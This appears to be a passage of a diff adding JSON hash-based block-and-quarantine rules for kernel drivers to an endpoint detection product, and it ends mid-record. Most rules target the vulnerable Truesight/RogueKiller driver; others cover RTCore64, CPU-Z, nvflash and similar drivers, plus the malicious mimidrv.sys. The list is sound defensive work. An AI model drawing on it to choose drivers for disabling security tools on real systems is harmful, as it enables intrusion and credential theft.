+ "id": "9f7c0e58-f5a9-5cf4-b97d-486a614fbd26",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490627Z",
+ "creation_date": "2026-03-23T11:45:31.490629Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490634Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "071336578deab97acdc527d45d67122ab60792452e87e2c4266290cf5256ee5e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9f9a184a-250e-54f2-81e1-8fcf735e6d8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464507Z",
+ "creation_date": "2026-03-23T11:45:30.464511Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4fb31e3f24e40742a1b9855a2d67048fe64b26d8d2dbcec77d2d5deeded2bcc",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9f9adde1-e4ae-5b02-b8b2-aafd85316833",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480507Z",
+ "creation_date": "2026-03-23T11:45:30.480509Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480515Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf63f518c9e45fe87d336c87938eb587049602707f1ed16d605f8521f88e4a96",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fa0cc83-f406-59b3-9c36-31847d8bbe11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472022Z",
+ "creation_date": "2026-03-23T11:45:31.472025Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8005fee105b6f251dc19050ea88526f12fc87eb9a7326ad65638fe5d0e1d2efa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fa4c017-9654-5e44-af87-98f895df6718",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157015Z",
+ "creation_date": "2026-03-23T11:45:31.157017Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157022Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18d02775e841b6e56ea1f9b2dc56a3596dc2f3e0480ffd5f0cacf4e7e724de38",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fa6bfc5-f95e-5596-9358-1c852a366575",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480616Z",
+ "creation_date": "2026-03-23T11:45:30.480618Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6370c82c2dbdf93608cccb88d78468edeb27f5d08f9ed0baf161842c0751f6a4",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fb01145-e9bf-5ca0-a00b-6ff17d666196",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472259Z",
+ "creation_date": "2026-03-23T11:45:31.472263Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472272Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1bb1d40fca74e8b9779f6a8dfe2aa39350fcd046fb132ee1e63f11576c4a1f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fb4c515-f2b4-5452-a6a7-498f84863df3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487487Z",
+ "creation_date": "2026-03-23T11:45:31.487489Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487495Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92e8e56516313d95a3848cc8bf31f62772f9429b24005d59ccf45fb2c9865806",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fcced42-d254-51f3-bfe5-bab106d8d5b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143686Z",
+ "creation_date": "2026-03-23T11:45:31.143688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143694Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4ee46b5a64e9b71632e6bccc028ae959718fe15625dd2dea6a51f7cc015e399",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fdae2e8-aafb-5ecd-b928-1c6bb6ae6c3c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618426Z",
+ "creation_date": "2026-03-23T11:45:29.618428Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618433Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd94be9ac97f06abe64426933fbee02871d5d181b1d9025daf1aaa92d9342e90",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fdcebfc-1fd6-5c4f-af1e-f995e4007826",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458964Z",
+ "creation_date": "2026-03-23T11:45:30.458967Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47e35f474f259314c588af35e88561a015801b52db523eb75fc7eccff8b3be4d",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fdecf22-f3bc-552e-a0a7-80456fd7a070",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481961Z",
+ "creation_date": "2026-03-23T11:45:31.481965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1b9f1931bc06e8c1e960ba68e47793ba665ee7867fd506380284c56c82eb891",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fe1f196-abaf-5987-9479-2cda5786f07b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604392Z",
+ "creation_date": "2026-03-23T11:45:29.604394Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604399Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ad2df1ae0c1ffaa2492de91bbe24ff6bf2b2beb18a62366207dfb4257ed5c60",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9fed866a-4ffd-5f83-9ef5-bd003504f9d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836226Z",
+ "creation_date": "2026-03-23T11:45:30.836228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b42083b947b3470a55bb521a09099c25d87da901636ecd44db5772b8f9dcabd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a00fdff5-7af7-55d2-880c-c36ef64ce3b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157475Z",
+ "creation_date": "2026-03-23T11:45:31.157477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "beb70f7809807d896af9f895e13f81619bef76ae1a365bd474a48c832845b291",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a014a0f7-396d-59e5-9ad3-214d83060ab1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828913Z",
+ "creation_date": "2026-03-23T11:45:30.828915Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828920Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9b66666884c70dbf81a6527ecabe874406c7000f799a1c40a12e879a88b3946",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a02aaf1d-192a-59ba-8f51-431a901e137e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499216Z",
+ "creation_date": "2026-03-23T11:45:31.499219Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b81fd3758ff5699d0a19666084589e26c852c1b09cc5ad4d95738ed752696c71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a02c8c9b-5d11-568c-ab26-3039aacfee33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811169Z",
+ "creation_date": "2026-03-23T11:45:31.811171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb1b4cda773e14f1cca653451fce84d908fdc22d1acddae42627b9711012ba90",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a03c4320-54e7-5edd-916d-7a44c8911a8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150967Z",
+ "creation_date": "2026-03-23T11:45:31.150969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e74d2b56f8ea71f5ba816420cefd44a7f780bcc97a6e315226705edd107f69ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a0421c55-eb48-5989-b144-d84321c73057",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977495Z",
+ "creation_date": "2026-03-23T11:45:29.977498Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977503Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29a90ae1dcee66335ece4287a06482716530509912be863c85a2a03a6450a5b6",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a043a402-37ff-5c76-9411-56fde8284dec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607543Z",
+ "creation_date": "2026-03-23T11:45:29.607545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607551Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c5d7069f85ec1d6f58147431f88c4d7c48df73baf94ffdefd664f2606baf09c",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a04b8903-c331-57ef-afb7-5957517ed6eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610934Z",
+ "creation_date": "2026-03-23T11:45:29.610936Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610948Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b5aecfecf26145aadd23f96a1cdfae0bca4e53af215d4bd77bba5dcc5a4479b",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a04c6128-0e7c-5459-ba1e-4a51909d4304",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
